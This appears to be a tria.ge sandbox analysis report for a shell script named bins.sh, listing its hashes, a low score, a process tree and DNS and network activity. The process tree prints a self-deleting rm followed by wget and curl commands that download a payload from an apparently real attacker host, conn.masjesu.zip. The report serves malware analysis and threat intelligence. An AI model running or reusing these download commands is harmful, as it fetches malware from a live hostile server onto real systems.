Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

bins.sh

ubuntu-18.04-amd64

3

bins.sh

debian-9-armhf

4

bins.sh

debian-9-mips

10

bins.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    148s
  • max time network
    129s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240508-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    04/01/2025, 20:07 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    942d94d9683731e7c0e80fb1184455c6

  • SHA1

    bcb4bc2b172dd258e1864c02f6e19b3a35b0d610

  • SHA256

    67e889a87756f6c3c9efbbe222582538a388eb437b8b98840566a49576b776d8

  • SHA512

    58c5eb1e3024d4d713047c5b02ace9a829c3161d260ca04e126f21e93e40fb990dbc3fd0b4235210b994411f852fac2dffe07daac1ab029f7b62f8c087fec9d0

  • SSDEEP

    96:Y/T/v/UJJFSqhLzP4LRJLfh1hVhWxt3UDfUjgjcjf8cpaSzTv1koCLHbIi6loooE:nY1b7Wxt3uTJlEn3ncb7WxtiJlEn3Z

Score
3/10
discovery

Malware Config

Signatures

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:1516
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:1517
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/3NOGXxXh3PKsA8UjthzWQcC5CuyqMFfu9h
          2⤵
          • System Network Configuration Discovery
          PID:1518
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/3NOGXxXh3PKsA8UjthzWQcC5CuyqMFfu9h
          2⤵
          • System Network Configuration Discovery
          PID:1519

      Network

      • flag-us
        DNS
        conn.masjesu.zip
        Remote address:
        1.1.1.1:53
        Request
        conn.masjesu.zip
        IN A
        Response
        conn.masjesu.zip
        IN A
        66.63.187.225
        conn.masjesu.zip
        IN A
        146.19.162.73
      • flag-us
        DNS
        conn.masjesu.zip
        Remote address:
        1.1.1.1:53
        Request
        conn.masjesu.zip
        IN AAAA
        Response
      • 185.125.188.61:443
        tls
        135 B
         2
      • 185.125.188.61:443
        tls
        135 B
         2
      • 151.101.1.91:443
        tls, https
        233 B
         40 B
         1
        1
      • 151.101.1.91:443
        extensions.gnome.org
        tls
        1.1kB
         5.8kB
         14
        14
      • 89.187.167.3:443
        tls, https
        8.2kB
         33
      • 1.1.1.1:53
        conn.masjesu.zip
        dns
        73 B
         105 B
         1
        1

        DNS Request

        conn.masjesu.zip

        DNS Response

        66.63.187.225
        146.19.162.73

      • 1.1.1.1:53
        conn.masjesu.zip
        dns
        73 B
         136 B
         1
        1

        DNS Request

        conn.masjesu.zip

      • 224.0.0.251:5353
        146 B
         2

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.